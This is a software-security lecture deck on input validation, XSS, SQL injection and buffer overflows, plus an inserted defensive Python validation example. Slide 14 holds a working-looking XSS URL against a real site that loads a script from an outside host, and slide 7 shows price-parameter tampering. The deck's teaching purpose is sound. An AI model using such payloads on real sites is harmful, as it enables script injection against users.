Software Security - PowerPoint PPT Presentation

Slides: 21
Provided by: compu62


1
Software Security
  • Ben Hubbard
  • Jason Fletcher
  • Szabolcs Palinko
  • Amit Tambe
  • Ryan Smith
  • Keith Gargano

2
Overview
  • Discussion
  • Data Validation
  • General Errors
  • Input Sanitization
  • Parameter Manipulation
  • Code Injection
  • Bounds and Type Checking
  • Specific Exploits
  • Buffer Overflows
  • Cross Site Scripting (XSS)
  • SQL Injection
  • Prevention
  • Demonstrations
  • Conclusion

3
Discussion
  • What causes exploits?
  • Failure to meet requirements
  • Omissions
  • Errors, poor quality assurance
  • Etc.

4
Data Validation
  • Process of ensuring that a program operates on
    clean, correct and useful data
  • Most vulnerabilities are a result of poor data
    validation techniques

5
Data Validation Errors
  • Input Sanitization
  • Bounds and Type Checking

6
Input Sanitization
  • Failure to filter user input
  • Leads to Parameter Manipulation and Code Injection

7
Parameter Manipulation
  • Ability for input from a form to be changed
  • Example
  • http://www.example.corsaire.com/buySpatula.jsp?modelNumber=234
  • http://www.example.corsaire.com/buySpatula.jsp?modelNumber=234&price=0.1

8
Code Injection
  • Subverting input so that data is interpreted as
    commands
  • Basis of SQL injection and Cross-site Scripting

9
Bounds and Type Checking
  • Ensuring that the program safely handles any
    input outside of expected values
  • Expecting positive integers from 1 to 10, getting
    -1
  • Expecting an integer, getting a decimal number

10
Vulnerability Examples
  • Buffer Overflow
  • Cross-site Scripting (XSS)
  • SQL Injection

11
Buffer Overflows
  • Injecting more data than a particular abstract
    container can hold, so that the data spills
    over into places it should not be, in order to
    cause changes to the system
  • Example of Bounds Checking

12
Buffer Overflows
  • OS Specific
  • Famous example: strcpy
  • Copies data from a source string to a destination
    string without verifying the size of the
    destination string is large enough to hold the
    data
  • Replaced with strncpy
  • strcpy is still supported for legacy code
    compatibility

13
Cross-site Scripting (XSS)
  • Dynamic web pages can be produced based on user
    input
  • Users can input scripts into input sources, thus
    allowing malicious code to be run on a trusted
    site
  • Example of Code Injection

14
Cross-site Scripting (XSS)
  • http://www.bbc.co.uk/bbcone/listings/index.shtml?service_id=4223&DAY=today%20%22%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--

15
Cross-site Scripting (XSS)

16
SQL Injection
  • Inserting SQL statements into user input to have
    those commands executed by the database
  • Example of Code Injection
  • Integration between database and OS allows
    execution of OS commands

17
Prevention
  • Reject bad data, accept only known good data
  • Regular expressions
  • Test all bounds
  • Black box testing
  • Thorough Quality Assurance

18
Prevention
  • Buffer Overflows: Use methods that inspect input
    size, manually inspect each input for
    correctness, random addressing
  • XSS: Disable scripting languages, filter
    characters
  • SQL Injection: Sanitize user input, use bound
    parameters (prepared statements)
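
The prevention rules from slides 17 and 18, applied to the buySpatula request from slide 7, as an added example that is not part of the original presentation. The SQLite table, the `quantity` parameter and all function names are assumptions made for illustration.

```python
import re
import sqlite3

# Constructed catalogue for this example; table and column names are assumptions.
def make_catalogue():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE spatula (model INTEGER PRIMARY KEY, price REAL)")
    db.executemany("INSERT INTO spatula VALUES (?, ?)", [(234, 12.50), (235, 15.00)])
    return db

MODEL_RE = re.compile(r"[0-9]{1,4}")  # known-good shape: 1 to 4 ASCII digits
QTY_RE = re.compile(r"[0-9]{1,2}")
MAX_QTY = 10                          # bounds from slide 9: 1 to 10

def parse_int(raw, pattern, lo, hi):
    """Accept only known-good data: exact pattern match, then a range check."""
    if not isinstance(raw, str) or not pattern.fullmatch(raw):
        raise ValueError("rejected: not a plain integer")
    value = int(raw)
    if not lo <= value <= hi:
        raise ValueError("rejected: out of bounds")
    return value

def price_order(db, params):
    """Price an order from request parameters (a dict of strings).

    A client-supplied 'price' is never read: the price comes from the
    server's own table, so editing the URL cannot change it.
    """
    model = parse_int(params.get("modelNumber"), MODEL_RE, 1, 9999)
    qty = parse_int(params.get("quantity", "1"), QTY_RE, 1, MAX_QTY)
    # Bound parameter: the value travels as data, never spliced into the SQL text.
    row = db.execute("SELECT price FROM spatula WHERE model = ?", (model,)).fetchone()
    if row is None:
        raise ValueError("rejected: unknown model")
    return round(row[0] * qty, 2)
```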

19
Demonstrations
  • IE Buffer Overflow Jamikazu Attack
  • Firefox Buffer Overflow
  • Metasploit Framework

20
Conclusion
  • www.milw0rm.com
  • www.metasploit.org